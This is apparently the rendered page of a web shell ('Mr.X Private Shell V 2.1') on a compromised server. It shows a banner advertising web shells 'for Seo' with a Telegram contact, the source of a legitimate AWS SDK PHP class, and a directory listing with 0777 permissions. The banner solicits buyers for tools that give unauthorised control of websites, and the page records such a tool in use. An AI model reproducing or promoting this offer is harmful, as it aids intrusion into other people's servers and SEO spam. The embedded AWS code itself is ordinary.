__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Aws\Api;
/**
* Represents a structure shape and resolve member shape references.
*/
class StructureShape extends Shape
{
/**
* @var Shape[]
*/
private $members;
public function __construct(array $definition, ShapeMap $shapeMap)
{
$definition['type'] = 'structure';
if (!isset($definition['members'])) {
$definition['members'] = [];
}
parent::__construct($definition, $shapeMap);
}
/**
* Gets a list of all members
*
* @return Shape[]
*/
public function getMembers()
{
if (empty($this->members)) {
$this->generateMembersHash();
}
return $this->members;
}
/**
* Check if a specific member exists by name.
*
* @param string $name Name of the member to check
*
* @return bool
*/
public function hasMember($name)
{
return isset($this->definition['members'][$name]);
}
/**
* Retrieve a member by name.
*
* @param string $name Name of the member to retrieve
*
* @return Shape
* @throws \InvalidArgumentException if the member is not found.
*/
public function getMember($name)
{
$members = $this->getMembers();
if (!isset($members[$name])) {
throw new \InvalidArgumentException('Unknown member ' . $name);
}
return $members[$name];
}
private function generateMembersHash()
{
$this->members = [];
foreach ($this->definition['members'] as $name => $definition) {
$this->members[$name] = $this->shapeFor($definition);
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ErrorParser | Folder | 0777 |
|
|
| Parser | Folder | 0777 |
|
|
| Serializer | Folder | 0777 |
|
|
| AbstractModel.php | File | 1.96 KB | 0777 |
|
| ApiProvider.php | File | 7.47 KB | 0777 |
|
| DateTimeResult.php | File | 4.09 KB | 0777 |
|
| DocModel.php | File | 3.38 KB | 0777 |
|
| ListShape.php | File | 786 B | 0777 |
|
| MapShape.php | File | 1.14 KB | 0777 |
|
| Operation.php | File | 3.38 KB | 0777 |
|
| Service.php | File | 13.53 KB | 0777 |
|
| Shape.php | File | 1.81 KB | 0777 |
|
| ShapeMap.php | File | 1.46 KB | 0777 |
|
| StructureShape.php | File | 1.65 KB | 0777 |
|
| TimestampShape.php | File | 1.45 KB | 0777 |
|
| Validator.php | File | 10.04 KB | 0777 |
|